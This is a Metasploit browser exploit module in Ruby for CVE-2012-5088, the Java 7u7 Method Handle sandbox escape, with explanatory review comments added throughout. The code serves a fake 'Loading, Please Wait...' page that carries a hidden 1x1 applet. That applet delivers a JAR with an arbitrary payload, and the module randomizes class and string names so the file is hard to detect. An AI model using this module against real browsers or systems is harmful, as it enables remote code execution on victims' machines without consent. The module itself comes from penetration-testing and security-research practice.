Path: blob/master/modules/exploits/multi/browser/java_jre17_method_handle.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for CVE-2012-5088 (Java 7u7 and earlier, see the
# 'Description' below).
#
# The module runs an HTTP server (HttpServer::HTML mixin) whose handler is
# #on_request_uri: a request for a path ending in "/" gets an HTML page that
# embeds a 1x1 <applet>, and the applet's JAR is served on the follow-up
# request for any path ending in ".jar". The JAR is the framework's encoded
# Java payload plus two precompiled class files that #setup reads from the
# data directory. The exploit class name, the JAR file name and the
# 'metasploit'/'Payload' strings inside the JAR are all randomized, so the
# served artifact has no fixed name from request to request.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  # NOTE(review): Msf::Exploit::EXE is mixed in, but none of its helpers
  # appear to be called anywhere in this file — confirm it is still needed.
  include Msf::Exploit::EXE

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Module metadata. Targets are the generic Java payload (default) and
  # native x86 payloads for Windows, OS X and Linux; 'Space' is the upper
  # bound on the encoded payload size this module accepts.
  #
  # @param info [Hash] metadata merged by the framework via +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet Method Handle Remote Code Execution',
        'Description' => %q{
          This module abuses the Method Handle class from a Java Applet to run arbitrary
          Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
          earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability discovery at security-explorations.com
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-5088' ],
          [ 'OSVDB', '86352' ],
          [ 'BID', '56057' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
        ],
        'Payload' => { 'Space' => 20480, 'DisableNops' => true },
        # NOTE(review): 'Platform' is an Array for the Java target but a bare
        # String for the native targets; the framework accepts both, but the
        # inconsistency is worth normalizing.
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-10-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the two precompiled class files shipped under
  # data/exploits/cve-2012-5088/ in the framework data directory, randomizes
  # the exploit class name, then lets +super+ start the HTTP server.
  #
  # The replacement name is generated with the same length as 'Exploit'
  # (+rand_text_alpha('Exploit'.length)+). The rename is a plain byte
  # substitution inside a compiled .class file, so keeping the length equal
  # is what keeps the file's internal offsets valid — presumably the
  # length-prefixed constant-pool entries that carry the class name. Every
  # occurrence of the literal 'Exploit' in the file is rewritten, not only
  # the class name. B.class is kept under its original name.
  def setup
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5088', 'Exploit.class')
    # Block form closes the file; read(stat.size) slurps it as binary.
    @exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5088', 'B.class')
    @loader_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha('Exploit'.length)
    # In-place rewrite of the bytes read above; same length as the original.
    @exploit_class.gsub!('Exploit', @exploit_class_name)
    super
  end

  # HTTP request handler for the module's resource URI.
  #
  # Routing is by request path only:
  # * a path ending in ".jar" (case-insensitive) gets the applet JAR;
  # * a path ending in "/" gets the HTML page from #generate_html;
  # * anything else is redirected to the resource URI plus "/".
  #
  # NOTE(review): both patterns anchor with +$+, which matches at the end of a
  # line rather than the end of the string; harmless for routing a URI, but
  # +\z+ is the conventional whole-string anchor.
  #
  # The JAR is +payload.encoded_jar+ — presumably the payload produced by the
  # most recent +regenerate_payload+ in the "/" branch, since the ".jar"
  # branch does not regenerate it — with the two class files loaded in #setup
  # added. The literals 'metasploit' and 'Payload' are then replaced with
  # same-length random strings in every entry's name and contents before
  # +build_manifest+ runs, presumably so the manifest is written against the
  # renamed entries.
  #
  # @param cli the client connection
  # @param request the parsed HTTP request; only +request.uri+ is consulted
  # @return [void]
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file('B.class', @loader_class)
      metasploit_str = rand_text_alpha('metasploit'.length)
      payload_str = rand_text_alpha('payload'.length)
      jar.entries.each do |entry|
        # Names are rewritten in place (gsub! returns nil when nothing
        # matches, which is fine here because the result is not used);
        # data is reassigned from a non-mutating gsub.
        entry.name.gsub!('metasploit', metasploit_str)
        entry.name.gsub!('Payload', payload_str)
        entry.data = entry.data.gsub('metasploit', metasploit_str)
        entry.data = entry.data.gsub('Payload', payload_str)
      end
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/$}
      payload = regenerate_payload(cli)
      # A failed payload generation answers 404 instead of serving the page.
      if !payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the landing page: a "Loading, Please Wait..." placeholder plus a
  # 1x1 <applet> whose +archive+ is a random 8-letter name with a ".jar"
  # suffix (any such name is accepted by the ".jar" branch of
  # #on_request_uri, so a fresh name per page is fine) and whose +code+ is
  # the randomized exploit class name chosen in #setup.
  #
  # @return [String] the HTML document
  def generate_html
    html = %(<html><head><title>Loading, Please Wait...</title></head>)
    html += %(<body><center><p>Loading, Please Wait...</p></center>)
    html += %(<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">)
    html += %(</applet></body></html>)
    return html
  end
end